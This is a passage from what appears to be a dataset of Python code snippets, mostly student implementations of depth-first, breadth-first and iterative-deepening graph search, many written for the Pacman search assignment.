track_history.append(explored_track[leaf])\r\n leaf = explored_track[leaf]\r\n\r\n for j in range (len(track_history),-1,-1):\r\n this_step = track_history[j-1]\r\n this_step = this_step[1]\r\n track_history_direction.append(this_step)\r\n return track_history_direction[:-1]", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n fringe = util.Stack()\n return GraphSearch(problem, 'dfs').search(fringe)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n from util import Stack\n \n st = Stack()\n mapper = {}\n mapper[problem.getStartState()] = None\n\n st.push(problem.getStartState())\n while not(st.isEmpty()):\n vertex = st.pop()\n \n if (problem.isGoalState(vertex)):\n c = vertex\n l = []\n while mapper[c] != None:\n tup = mapper[c]\n l.append(tup[1])\n c = tup[0]\n l.reverse()\n print l\n return l\n\n else:\n neigh = problem.getSuccessors(vertex)\n # neigh.reverse()\n # neigh.sort()\n for child in neigh:\n if child[0] not in mapper:\n st.push(child[0])\n mapper[child[0]] = (vertex, child[1])\n # print mapper\n \n # visited = []\n # p = dfsRecursive(problem, problem.getStartState(), st, visited, [])\n # return p\n \n # pathfind = {}\n # st.push(problem.getStartState())\n # iterative approach:\n # while (not st.isEmpty()):\n # point = st.pop() # (x,y)\n # if problem.isGoalState(point):\n # # print point\n # print pathfind\n # # print visited\n # elif (not (point in visited)):\n # visited.append(point)\n # # print pathfind, '\\n'\n # print visited, '\\n'\n # for child in problem.getSuccessors(point):\n # st.push(child[0])\n # pathfind[child[0]] = point #this preemptively adds!\n # util.raiseNotDefined()", "def iterativeDeepeningSearch(problem):\n from util import Stack\n \n for max_depth in range(0, 10000000):\n # print max_depth\n st = Stack()\n mapper = {}\n mapper[(problem.getStartState(), 0)] = None #map of (childpos, depth): (parentpos, direction, depth)\n st.push((problem.getStartState(), 0)) # stack of ((x,y) , depth)\n\n while not(st.isEmpty()):\n vertex = st.pop() #( (x,y) , depth )\n depth = vertex[1]\n\n if (problem.isGoalState(vertex[0])):\n c = vertex\n l = []\n while mapper[c] != None:\n tup = mapper[c]\n l.append(tup[1])\n c = tup[0], tup[2]\n l.reverse()\n print \"max_depth: \", max_depth\n print l\n return l\n\n else:\n n_depth = depth + 1 # new depth\n if n_depth < max_depth:\n neigh = problem.getSuccessors(vertex[0])\n # neigh.reverse()\n for child in neigh:\n if (child[0], n_depth) not in mapper:\n st.push((child[0], n_depth))\n mapper[(child[0], n_depth)] = (vertex[0], child[1], depth)", "def depth_first_graph_search(problem):\n\n\tfrontier = [(Node(problem.initial))] # Stack (implemented as a list)\n\n\texplored = set()\n\twhile frontier:\n\t\tnode = frontier.pop()\n\t\tif problem.goal_test(node.state):\n\t\t\treturn node\n\t\texplored.add(node.state)\n\t\tfrontier.extend(child for child in node.expand(problem)\n\t\t\t\t\t\tif child.state not in explored and child not in frontier)\n\treturn None", "def recursive_search(i, F, t, s, explored, leaders, order):\n x = len(explored)\n if x % 10 == 0:\n print(\"Length of explored: {}\".format(x))\n explored.append(i)\n if order == 2:\n leaders[i] = s\n arc_list = db.Database.find_one(collection=\"biggraph\", query={\"key\": i})\n if arc_list:\n for node in arc_list['value']:\n if node not in explored:\n F, t, leaders, explored = recursive_search(node, F, t, s, explored, leaders, order)\n if order == 1:\n t += 1\n F[i] = t\n return F, t, leaders, explored", "def depthFirstSearch(problem):\r\n\t\"*** YOUR 
CODE HERE ***\"\r\n\r\n\tfrontera = util.Stack()\r\n\testadoInicial= problem.getStartState()\r\n\tfrontera.push((estadoInicial, [],0))\r\n\tvisitados=[]\r\n\tvisitados.append(estadoInicial)\r\n\r\n\twhile not(frontera.isEmpty()):\r\n\t\t(estado, camino, costo) =frontera.pop()\r\n\t\tif(problem.isGoalState(estado)):\r\n\t\t\tbreak\r\n\r\n\t\tsucesores=problem.getSuccessors(estado)\r\n\t\tfor sucesor in sucesores:\r\n\t\t\tif sucesor[0] not in visitados:\r\n\t\t\t\tfrontera.push((sucesor[0], camino + [sucesor[1]], costo + sucesor[2]))\r\n\t\t\t\tvisitados.append(sucesor[0])\r\n\tprint ('Cantidad de nodos en memoria: {}').format(len(frontera.list))\r\n\treturn camino", "def dfs(n):\n if seen[n]: return seen[n] == 1 \n seen[n] = 1\n if any(dfs(nn) for nn in digraph.get(n, set())): return True \n seen[n] = 2\n return False", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n frontier = util.Stack()\n start_node = problem.getStartState()\n\n if problem.isGoalState(start_node):\n return ['Stop']\n frontier.push((start_node,[]))\n explored = set()\n while True:\n if frontier.isEmpty():\n return []\n node = frontier.pop()\n explored.add(node[0])\n for successor in problem.getSuccessors(node[0]):\n nextState, action, cost = successor\n if nextState in explored or nextState in [f[0] for f in frontier.list]:\n continue\n actions = node[1][:]\n actions.append(action)\n new_node = (nextState, actions)\n if problem.isGoalState(new_node[0]):\n return new_node[1]\n frontier.push(new_node)\n #print frontier.list\n return []", "def search(G):\n visited = set()\n \n for v in range(len(G)):\n if v not in visited:\n yield v,v,forward\n visited.add(v)\n stack = [(v,iter(G[v]))]\n while stack:\n parent,children = stack[-1]\n try:\n child = next(children)\n if child in visited:\n yield parent,child,nontree\n else:\n yield parent,child,forward\n visited.add(child)\n stack.append((child,iter(G[child])))\n except StopIteration:\n stack.pop()\n if stack:\n yield stack[-1][0],parent,reverse\n yield v,v,reverse", "def depthFirstSearch(problem):\n container = util.Stack() \n return depthOrBreadthFirstSearch(problem, container)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n \n #Stack to hold the node that have been visited along with the path taken from the start node to reach that node.\n stack = Stack()\n #Set to hold the node explored.\n explorednode = set()\n #Get the start node.\n startnode = problem.getStartState()\n #Push the starting node on the Stack along with an empty set to know the direction in order to reach the node.\n stack.push((startnode,[]))\n #Loop till the stack is empty\n while stack.isEmpty() is not True:\n #Pop the currentnode and the direction from the stack\n currentnode, direction = stack.pop()\n #We will now add the node to set of explored node.\n explorednode.add(currentnode)\n #If the node is the goal. 
We made it!!\n if problem.isGoalState(currentnode):\n #print currentnode, direction\n #The direction holds the way to reach till the goal from the start node.\n #print direction\n return direction\n #Loop for each successor(child) of the current node.\n for (successor, action, stepCost) in problem.getSuccessors(currentnode):\n #If the successor(child) is not explored\n if successor not in explorednode:\n #Add the successor to the stack along with the path to reach it.\n stack.push((successor, direction + [action]))", "def depthFirstSearch(problem):\n stack = Stack()\n\n visited = []\n parent_dict = dict()\n start_state = problem.getStartState()\n stack.push(start_state)\n current_path = []\n actions_dict = dict()\n final_actions = []\n flag = False\n\n if problem.isGoalState(problem.getStartState()):\n return []\n\n while not stack.isEmpty():\n current_state = stack.pop()\n current_path.append(current_state)\n visited.append(current_state)\n\n if problem.isGoalState(current_state):\n break\n\n successors = problem.getSuccessors(current_state)\n\n for s in successors:\n flag = False\n if s[0] not in visited:\n stack.push(s[0])\n parent_dict[s[0]] = current_state\n actions_dict[(current_state, s[0])] = s[1]\n flag = True\n\n\n\n if not successors and not stack.isEmpty() or flag is False:\n current_state = stack.pop()\n while current_path[-1] != parent_dict[current_state]:\n current_path.pop()\n stack.push(current_state)\n\n for i in range(len(current_path)-1):\n final_actions.append(actions_dict[current_path[i],current_path[i+1]])\n\n\n return final_actions", "def dft_recursive(self, starting_vertex, visited=None):\n \n # for vertex in self.get_neighbors(starting_vertex):\n # if vertex not in visited:\n # visited.add(vertex)\n # self.dft_recursive(vertex, visited)\n # return visited\n if visited == None:\n visited = set()\n print(starting_vertex)\n visited.add(starting_vertex)\n for v in self.get_neighbors(starting_vertex):\n if v not in visited:\n self.dft_recursive(v, visited)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n \n from game import Directions\n visited = set() # unique elements\n state = problem.getStartState()\n #returns starting agent's position\n waiting_list = util.Stack()\n # LIFO\n # last in first out\n # parents = collections.defaultdict(collections.UserDict)\n parents = {}\n #dictionary\n sequence = []\n #LIFO\n for action in problem.getSuccessors(state):\n # in order to push full-state values\n waiting_list.push(action)\n # enumarating tuple\n\n while not waiting_list.isEmpty():\n state = waiting_list.pop()\n \n visited.add(state[0])\n # node is visited and we wont visit those nodes\n \n for substate in problem.getSuccessors(state[0]):\n # take a look to successors of current node\n \n if substate[0] not in visited:\n # if not in visited \n # saving parents\n parents[substate[0]]={'parent':state} \n # generate new node\n waiting_list.push(substate)\n # push to stack\n if problem.isGoalState(substate[0]): \n target_state = substate \n #finding wayback\n\n\n while target_state[0] in parents.keys():\n temp=parents[target_state[0]]['parent']\n sequence.append(target_state[1])\n target_state = temp\n sequence.append(target_state[1])\n return sequence[::-1]", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n # util.raiseNotDefined()\n\n # print(\"Start:\", problem.getStartState())\n # print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n # print(\"Start's successors:\", 
problem.getSuccessors(problem.getStartState()))\n\n # Initialize a frontier, and push the initial state into the frontier\n frontier = util.Stack()\n frontier.push([(problem.getStartState(), 'move', 0)])\n # Initialize a explored set to store the visited nodes\n exploredSet = set()\n\n # Check the content of frontier\n while not frontier.isEmpty():\n stateList = list()\n stateList = frontier.pop()\n # print (stateList)\n # What we focus on is the next state, not the (previous state + next state), so we should take the last element\n nextState = stateList[len(stateList) - 1]\n # Check the current state is goal or not\n if problem.isGoalState(nextState[0]):\n # Initial a path, which is the way to the goal state\n path = list()\n for eachMove in stateList:\n path.append(eachMove[1])\n # If the initial state is the goal state, there's no need to explore other nodes, so that's called special condition\n if len(path) == 1:\n return path[0]\n # This is the normal condition, we should convey the path except the first one, because we haven't define what's \"move\"\n else:\n return path[1:]\n # If this is a state which we don't visit, add it to the explored set(this is called GSA)\n if not nextState[0] in exploredSet:\n exploredSet.add(nextState[0])\n # Give me your child nodes\n for childState in problem.getSuccessors(nextState[0]):\n nextStateList = stateList[:]\n # we focus on the path, so we have to record the every move from the initial state to the current one\n nextStateList.append(childState)\n frontier.push(nextStateList)\n\n # Or maybe there's no way to the goal state\n else:\n return \"There's no way.\"", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n visited_nodes = []\n start_node = problem.getStartState()\n visited_nodes.append(start_node)\n curr_node = start_node\n q = util.Queue()\n directions = util.Queue()\n q.push(curr_node)\n goal_found = problem.isGoalState(curr_node)\n\n while not goal_found:\n nxt_node_list = problem.getSuccessors(curr_node)\n nxt_node_found = False\n\n # Check if a child can be found which has not been visited\n for node in nxt_node_list:\n nxt_node = node[0]\n move = node[1]\n if nxt_node not in visited_nodes:\n nxt_node_found = True # mark that a child node has been found\n q.push(nxt_node) # add the node in the tree\n directions.push(move) # add the direction\n visited_nodes.append(nxt_node) # mark the node as visited\n break\n\n # If child not found, go to parent\n if not nxt_node_found:\n q.list.pop(0)\n directions.list.pop(0)\n\n if q.isEmpty(): break\n\n curr_node = q.list[0]\n goal_found = problem.isGoalState(curr_node)\n\n final_moves = []\n while not directions.isEmpty():\n final_moves.append(directions.pop())\n \n return final_moves\n #util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n from util import Stack\n Pilha_Caminho = Stack()\n Pilha_Estados = Stack()\n Caminho = []\n Visitados = []\n\n Pilha_Caminho.push(Caminho) # empilha caminho (vazio, no começo)\n Pilha_Estados.push(problem.getStartState()) # empilha estado inicial\n\n while (Pilha_Caminho.isEmpty() == False and Pilha_Estados.isEmpty() == False):\n Caminho_Andado = Pilha_Caminho.pop() # atualiza caminho\n Estado_Atual = Pilha_Estados.pop() # atualiza estado\n if problem.isGoalState(Estado_Atual): # caso estado atual seja o desejado,\n return Caminho_Andado # retorna o caminho total\n if Estado_Atual not in Visitados: # caso estado atual não tenha sido visitado\n Visitados.append(Estado_Atual) # marca estado como visitado\n for 
Sucessor in problem.getSuccessors(Estado_Atual): # busca sucessores\n if Sucessor[0] not in Visitados: # caso sucessor não tenha sido visitado\n Pilha_Caminho.push(Caminho_Andado + [Sucessor[1]]) # atualiza caminho total na pilha\n Pilha_Estados.push(Sucessor[0]) # atualiza estado\n return", "def dft_recursive(self, starting_vertex, visited=None):\n if visited is None: # if visited is None\n visited = set() # create an empty 'set' to store visisted vertex, set sorts \n\n if starting_vertex not in visited: # if starting_vertex has not been visited yet\n print(starting_vertex)\n visited.add(starting_vertex) # add to the set \n\n for neighbor in self.vertices[starting_vertex]: # loop through each neighbor \n self.dft_recursive(neighbor, visited) # call the dft_recursive method on each neighbor ", "def search(G):\n visited = set()\n\n for v in range(len(G)):\n if v not in visited:\n yield v, v, forward\n visited.add(v)\n stack = [(v, iter(G[v]))]\n while stack:\n parent, children = stack[-1]\n try:\n child = next(children)\n if child in visited:\n yield parent, child, nontree\n else:\n yield parent, child, forward\n visited.add(child)\n stack.append((child, iter(G[child])))\n except StopIteration:\n stack.pop()\n if stack:\n yield stack[-1][0], parent, reverse\n yield v, v, reverse", "def dfs(start_node, goal_state, limit = None, iterative = False, graphSearch = False, improved_descendants = False):\t\n\tfringe = [start_node]\n\tnumber_nodes_expanded = 0\n\tnumber_nodes_visited = 0\n\n\tt0 = time.time()\n\n\tif graphSearch:\n\t\tclosed = {} #hash_map\n\n\twhile len(fringe) > 0:\n\t\tnumber_nodes_visited += 1\n\t\tnode = fringe.pop()\n\t\tnode.count = number_nodes_visited\n\n\t\tt1 = time.time()\n\t\tif (t1 - t0) > 900:\n\t\t\tprint(\"It took more than 15 min\")\n\t\t\tif iterative:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn False\n\t\t\n\t\tif node.check_solution(goal_state):\n\t\t\t_ = print_solution(node, number_nodes_expanded, goal_state)\n\t\t\tif iterative:\n\t\t\t\treturn True, number_nodes_visited\n\t\t\tprint(\"Expanded nodes: \" + str(number_nodes_expanded))\n\t\t\treturn True \n\n\n\t\tif limit == None or node.depth < limit:\n\t\t\tif graphSearch:\n\t\t\t\tnode_hash = node.build_hash()\n\t\t\t\tnode_depth = node.depth\n\t\t\t\t#can also add if it's found i at smaller depth. 
Grants solution every time\n\t\t\t\tif node_hash not in closed or closed[node_hash] > node_depth:\n\t\t\t\t\tclosed[node_hash] = node_depth\n\t\t\t\t\tnumber_nodes_expanded += 1\n\t\t\t\t\tchild_nodes = node.successors(improved_descendants)\n\t\t\t\t\tfor i in range(len(child_nodes)):\n\t\t\t\t\t\tfringe.append(child_nodes[i])\n\t\t\telse:\n\t\t\t\tnumber_nodes_expanded += 1\n\t\t\t\tchild_nodes = node.successors(improved_descendants)\n\t\t\t\tfor i in range(len(child_nodes)):\n\t\t\t\t\tfringe.append(child_nodes[i])\n\t\n\tif iterative:\n\t\treturn False, number_nodes_visited\n\t\t\t\n\treturn False", "def sudokuDepthFirstSearch(problem):\n\n def convertStateToHash(values):\n \"\"\" \n values as a dictionary is not hashable and hence cannot be used directly in the explored/visited set.\n This function changes values dict into a unique hashable string which can be used in the explored set.\n You may or may not use this\n \"\"\"\n l = list(sorted(values.items()))\n modl = [a+b for (a, b) in l]\n return ''.join(modl)\n\n ## YOUR CODE HERE\n root_node = Node(problem.getStartState(), [], 0, None, 0)\n frontier = util.Stack()\n frontier.push(root_node)\n explored = []\n\n while not(frontier.isEmpty()):\n node_to_explore = frontier.pop()\n\n if problem.isGoalState(node_to_explore.state):\n return node_to_explore.state\n else:\n copy_state = node_to_explore.state.copy()\n \n if convertStateToHash(copy_state) not in explored:\n\t explored.append(convertStateToHash(copy_state))\n\t successors_state = problem.getSuccessors(copy_state)\n\t if len(successors_state) > 0:\n\t\t for state_action_cost in successors_state:\n\t\t if convertStateToHash(state_action_cost[0]) in explored:\n\t\t continue\n\t\t else:\n\t\t frontier.push(Node(state_action_cost[0], state_action_cost[1], node_to_explore.path_cost + 1, node_to_explore, node_to_explore.depth + 1))\n\n return False\n # util.raiseNotDefined()", "def depthFirstSearch(problem):\n\n explored = set()\n frontier = []\n start_state = problem.getStartState()\n frontier.append(start_state)\n parent_hash = {}\n parent_hash[start_state] = (None, None)\n\n def get_path(state):\n path_stack = util.Stack()\n actions = []\n current = state\n while parent_hash[current][0] is not None:\n path_stack.push(parent_hash[current][0])\n current = parent_hash[current][1]\n while not path_stack.isEmpty():\n actions.append(path_stack.pop())\n\n return actions\n\n while len(frontier):\n node = frontier.pop()\n if problem.isGoalState(node):\n return get_path(node)\n explored.add(node)\n for state, action, _ in problem.getSuccessors(node):\n if state not in explored and state not in frontier:\n parent_hash[state] = (action, node)\n frontier.append(state)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n from util import Stack\n\n frontier = Stack()\n explored = []\n actions = []\n\n class node:\n def __init__(self, path, dad, action):\n self.path = path\n self.dad = dad\n self.action = action\n\n start = node(problem.getStartState(),'','')\n frontier.push(start)\n\n while frontier.isEmpty() == False:\n path = frontier.pop()\n successors = problem.getSuccessors(path.path)\n explored.append(path)\n for vertex in successors:\n achou = False\n for path_ex in explored:\n if vertex[0] == path_ex.path:\n achou = True\n if achou == False:\n successor = node(vertex[0],path.path,vertex[1])\n frontier.push(successor)\n if problem.isGoalState(successor.path):\n while len(explored) > 0:\n ant = explored.pop()\n if ant.path == successor.dad:\n actions.append(successor.action)\n 
successor = ant\n actions.reverse()\n return actions", "def depth_first_search(problem):\n fringe = util.Stack()\n return general_search(problem, fringe)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n stack = util.Stack() # stack for searshing the graph\n visited = [] # Keep track of visited nodes\n start =problem.getStartState() # The start node\n stack.push((start, [])) # the sart state and empty path list is pushed to the stack\n \n while stack:\n (vrtx, path) = stack.pop() # Pop tfrom the stack , vrtx: the poped node for expantion.\n if vrtx not in visited: # if the node is visited alraedy \n if problem.isGoalState(vrtx):\n return [p[1] for p in path]\n visited.append(vrtx)\n for successor in problem.getSuccessors(vrtx):\n stack.push((successor[0], path+[successor]))\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n fringeList = util.Stack()\n print \"fringeList\",fringeList\n closedList = {str(problem.getStartState()): ([])} #Hash Map to maintain state to path\n print \"closed list:\", closedList\n isGoalStateArrived = False\n\n # Push start state into fringeList\n fringeList.push((problem.getStartState()))\n\n while not isGoalStateArrived and not fringeList.isEmpty():\n currentNode = fringeList.pop()\n print \"currentNode\",currentNode\n currentNodePath = closedList[str(currentNode)]\n print \"currentNodepath:\",currentNodePath\n # Explore children\n childrenOfCurrentNode = problem.getSuccessors(currentNode)\n print \"childrenOfCurrentNode:\",childrenOfCurrentNode\n for childNode in childrenOfCurrentNode:\n if str(childNode[0]) not in closedList:\n path = copy.copy(currentNodePath)\n path.append(childNode[1])\n print \"child [0] %s, child [1] %s\", childNode[0],childNode[1]\n print \"path \", path\n fringeList.push(childNode[0])\n closedList[str(childNode[0])] = path # Put parent node in closed List\n if problem.isGoalState(childNode[0]):\n isGoalStateArrived = True\n goalState = childNode[0]\n break\n\n if isGoalStateArrived:\n #print closedList[str(problem.getStartState())]\n return closedList[str(goalState)]\n \"util.raiseNotDefined()\"", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n class Node:\n def __init__(self, state, parent, action, pathCost):\n self.state = state #state of the game\n self.parent = parent #parent of the node\n self.action = action #action that led to that node\n self.pathCost = pathCost #total cost of tha path until that node\n\n def solution(self): #return the path to the goal node\n path = [] #path is a list of actions\n tempNode = self #temp node is the goal node\n while tempNode.state != problem.getStartState(): #until we get to the initial node\n path.insert(0, tempNode.action) #insert at the start of the list\n tempNode = tempNode.parent #go to the parent of the node\n return path #return list of actions\n\n def childNode(successor, parent, action, stepCost):\n pathCost = parent.pathCost + stepCost #total cost is the total cost of the parent + the cost of the last action\n child = Node(successor, parent, action, pathCost) #create new child node\n return child\n\n initialNode = Node(problem.getStartState(), None, None, 0) #create initial node with start state and no parent\n if problem.isGoalState(initialNode.state):\n return initialNode.solution()\n\n frontier = util.Stack() #dfs uses a stack\n frontier.push(initialNode) #insert initial node to the stack\n explored = set() #explored nodes are added to a set\n\n while not frontier.isEmpty(): #while stack is not empty\n nextNode = 
frontier.pop() #extract the last node entered\n explored.add(nextNode.state) #add the state of the node to the explored set\n for successor, action, stepCost in problem.getSuccessors(nextNode.state): #for every successor create a new child\n child = childNode(successor, nextNode, action, stepCost)\n if child.state not in explored and child not in frontier.list: #if child is not already explored or is not in the stack\n if problem.isGoalState(child.state): # if node is goal node we return the path of actions\n return child.solution()\n frontier.push(child) #insert it into the stack\n\n return [] #if stack is empty\n util.raiseNotDefined()", "def graph_search(problem, verbose=False, debug=False):\r\n \r\n # PriorityQueue should be used to maintain the order of the queue.\r\n frontier = PriorityQueue()\r\n \r\n frontier.append(Node(problem, problem.initial))\r\n \r\n current_node = frontier.pop()\r\n \r\n p = True\r\n #depth first search\r\n if current_node.expand(current_node.problem)[0].g < 0:\r\n \r\n frontier = deque()\r\n frontier.append(Node(problem, problem.initial))\r\n #breadth first search\r\n elif current_node.expand(current_node.problem)[0].h < 2:\r\n \r\n p = False\r\n frontier = deque()\r\n frontier.append(Node(problem, problem.initial))\r\n #manhattan\r\n else:\r\n \r\n frontier.append(current_node)\r\n\r\n f_hash = Explored()\r\n f_hash.add(problem.initial.state_tuple())\r\n done = False\r\n n_explored = 0\r\n explored = Explored()\r\n\r\n #graph_search\r\n while not done:\r\n \r\n if p:\r\n current_node = frontier.pop()\r\n else:\r\n current_node = frontier.popleft()\r\n explored.add(current_node.state.state_tuple())\r\n n_explored = n_explored + 1 #inc the number of explored nodes\r\n\r\n if current_node.state.solved():\r\n path = current_node.path()\r\n done = True\r\n return path, n_explored\r\n #if not found in the tree return none and number of nodes explored\r\n else:\r\n \r\n for child in current_node.expand(current_node.problem):\r\n if not explored.exists(child.state.state_tuple()) and not \\\r\n f_hash.exists(child.state.state_tuple()):\r\n frontier.append(child)\r\n f_hash.add(child)\r\n done = len(frontier) == 0\r\n\r\n return None, n_explored", "def _dfsearch_recursive(self, footprint):\n self.visited[footprint] = 1\n self.temp_component.append(footprint)\n for neighbour in self.neighbours[footprint]:\n if self.visited[neighbour] == 0:\n self._dfsearch(neighbour)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n #util.Stack() = LIFO for DFS\n #travel down path until end of line unlike BFS, backtrack until there is another path\n\n visited = []\n\n frontier = util.Stack()\n frontier.push( (problem.getStartState(), []) ) \n\n while not frontier.isEmpty():\n node,actions = frontier.pop()\n\n if problem.isGoalState(node):\n return actions\n\n visited.append(node)\n\n for coord,direction,cost in problem.getSuccessors(node):\n if not coord in visited:\n frontier.push((coord, actions + [direction]))\n\n return []", "def bfs_visited(ugraph, start_node):\r\n queue = deque()\r\n visited = set() #Set is enough here.\r\n visited.add(start_node)\r\n queue.append(start_node)\r\n while len(queue) != 0:\r\n temp_node = queue.popleft()\r\n for neighbor in ugraph[temp_node]: #In graph theory, neighborhood is \r\n if neighbor not in visited: #well defined, so could be used directely.\r\n visited.add(neighbor)\r\n queue.append(neighbor)\r\n return visited", "def bfs(G, start, finish):\n if start == finish:\n return 0 # edge case - going to myself is 0\n marked = 
set()\n queue = deque()\n marked.add(start)\n queue.append((start, 0))\n while queue:\n cur, cur_depth = queue.popleft()\n children = G[cur]\n for child in children:\n if child == finish:\n return cur_depth + 1\n elif child not in marked:\n marked.add(child)\n queue.append((child, cur_depth + 1))\n return -1 # exhausted the whole queue and no path", "def dft_recursive(self, starting_vertex, visited = None):\n \"\"\"\n Check if Vertex is in visited\n if NOT visited, add to visited set\n Call dft_recursive on every neighbor \n \n\n \"\"\"\n # 1) base case >> where to stop recursion\n # 2) calls itself from within\n # 3) each iteration approaches base case\n\n # 1) base case >> where to stop recursion\n\n # init a set that persists after recursions loops to save visited\n if visited == None:\n visited = set()\n\n if starting_vertex not in visited: # 1) & 3) Check if vertex has NOT been visited\n visited.add(starting_vertex) # if True, add to visited set\n\n print(starting_vertex)\n\n # perform recursion on neighbor\n for n in self.get_neighbors(starting_vertex):\n self.dft_recursive(n, visited) # 2) ", "def bfs_w_depth(tree):\n visited = []\n frontier = [(0, tree)]\n while frontier:\n depth, tree = frontier.pop(0)\n if tree is not None:\n visited.append((depth, tree[0]))\n frontier.append((depth + 1, tree[1]))\n frontier.append((depth + 1, tree[2]))\n return visited", "def depthFirstSearch(problem):\n \n from game import Directions\n North = Directions.NORTH\n South = Directions.SOUTH\n East = Directions.EAST\n West = Directions.WEST \n \n pathDict = {}\n visited = set()\n #visited start\n visited.add(problem.getStartState())\n #initial successors\n successor = problem.getSuccessors(problem.getStartState())\n for initSucc in successor:\n pathDict[initSucc[0]] = [initSucc[1]]\n #loop\n while (1):\n #if fringe = null, return failure\n if (len(successor) == 0):\n print \"Fringe is empty\"\n return util.raiseNotDefined()\n #(v, path) = fringe.pop\n succLocation = successor[0][0]\n succDirection = successor[0][1]\n del successor[0]\n #if isGoal = true, return path\n if problem.isGoalState(succLocation):\n return pathDict[succLocation]\n #if visited = false\n if succLocation not in visited:\n #visited = true\n visited.add(succLocation)\n #L = expand(v,path)\n tempSuccList = problem.getSuccessors(succLocation)\n #Fringe <- L\n for succ in reversed(tempSuccList):\n successor.insert(0,succ)\n pathDict[succ[0]] = []\n pathDict[succ[0]].extend(pathDict[succLocation])\n pathDict[succ[0]].append(succ[1])", "def breadth_first_traversal(self, start):\n visited = []\n visited.append(start)\n start_visited = visited\n while True:\n temp = []\n for node_ in start_visited:\n for i in self.neighbors(node_):\n if i not in visited:\n visited.append(i)\n temp.append(i)\n start_visited = temp\n if not temp:\n break\n return visited", "def general_search(fringe, visited, limiting_depth):\n node_to_be_explored = fringe[0]\n node_state = node_to_be_explored['state']\n visited[node_state] = node_to_be_explored\n if goal_test(node_to_be_explored['state']):\n return generate_path(node_to_be_explored, visited)\n current_depth = node_to_be_explored['depth']\n if current_depth == limiting_depth:\n return False\n children = [\n {\n 'state': child_state,\n 'parent': node_state,\n 'depth': current_depth + 1,\n }\n for child_state in operator(node_state)]\n for child in children:\n if child['state'] in visited:\n continue\n fringe_copy = [child] + fringe[1:]\n visited_copy = visited.copy()\n solution = 
general_search(fringe_copy, visited_copy, limiting_depth)\n if solution:\n return solution\n else:\n continue\n return False", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n # current path stack\n path_stack = util.Stack()\n action_stack = util.Stack()\n path_stack.push(problem.getStartState())\n\n # visited (so don't )\n visited = []\n visited.append(problem.getStartState())\n\n i = 0\n while not path_stack.isEmpty():\n\n # check goal state\n if problem.isGoalState(path_stack.list[-1]): # check if goal\n return action_stack.list\n\n # get next possible state (choose first in list)\n successors = problem.getSuccessors(path_stack.list[-1])\n forward=False\n for successor in successors:\n ss,aa,_ = successor\n if ss not in visited:\n\n path_stack.push(ss)\n action_stack.push(aa)\n visited.append(ss) # you don't pop visited\n forward=True\n break\n\n # backtrack\n if forward==False:\n path_stack.pop()\n action_stack.pop()\n\n i+=1\n #if i==25:\n # import pdb; pdb.set_trace()\n #print(path_stack.list)", "def bfs_visited(ugraph, start_node):\n \n visited = set([start_node])\n cola = deque([start_node])\n \n while len(cola)>0:\n node = cola.popleft() \n for neigh in ugraph[node]:\n if not neigh in visited:\n visited.add(neigh)\n cola.append(neigh)\n \n return visited", "def DFSUtility(obj,vertex,visited,subGraph):\n visited[vertex] = True\n subGraph.append(vertex)\n for nxtVertex in obj.adjList[vertex]:\n if visited[nxtVertex]:\n continue\n DFSUtility(obj,nxtVertex,visited,subGraph)", "def dft_recursive(self, starting_vertex, visited=None):\n if visited is None:\n visited = set()\n visited.add(starting_vertex)\n print(starting_vertex)\n for neighb_vert in self.vertices[starting_vertex]:\n if neighb_vert not in visited:\n self.dft_recursive(neighb_vert, visited)", "def dfs(adj, used, order, x):\n # write your code here\n # Mark as visited\n used[x] = 1\n for v in adj[x]:\n if not used[v]:\n # If not visited, run dfs\n dfs(adj, used, order, v)\n # When no more recursion, add to the order list\n order.append(x)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE IF YOU WANT TO PRACTICE ***\"\n # Initialize a stack\n open = util.Stack()\n\n # Retrieve the init state\n initState = (problem.getStartState(), ['Stop'], 0)\n open.push(initState)\n closed = []\n\n while not open.isEmpty():\n currState = open.pop()\n currPos = currState[0]\n currPath = currState[1]\n currCost = currState[2]\n\n if problem.isGoalState(currPos):\n return currPath[1:]\n else:\n closed.append(currPos)\n if currState not in closed:\n successors = problem.getSuccessors(currPos)\n if len(successors) > 0:\n for each in successors:\n if each[0] not in closed:\n temp = (each[0], currPath+[each[1]], currCost+each[2])\n open.push(temp)\n return False", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n mystack = util.Stack()\n startNode = (problem.getStartState(), '', 0, [])\n mystack.push(startNode)\n visited = set()\n while mystack :\n node = mystack.pop()\n state, action, cost, path = node\n if state not in visited :\n visited.add(state)\n if problem.isGoalState(state) :\n path = path + [(state, action)]\n break;\n succNodes = problem.expand(state)\n for succNode in succNodes :\n succState, succAction, succCost = succNode\n newNode = (succState, succAction, cost + succCost, path + [(state, action)])\n mystack.push(newNode)\n actions = [action[1] for action in path]\n del actions[0]\n return actions", "def 
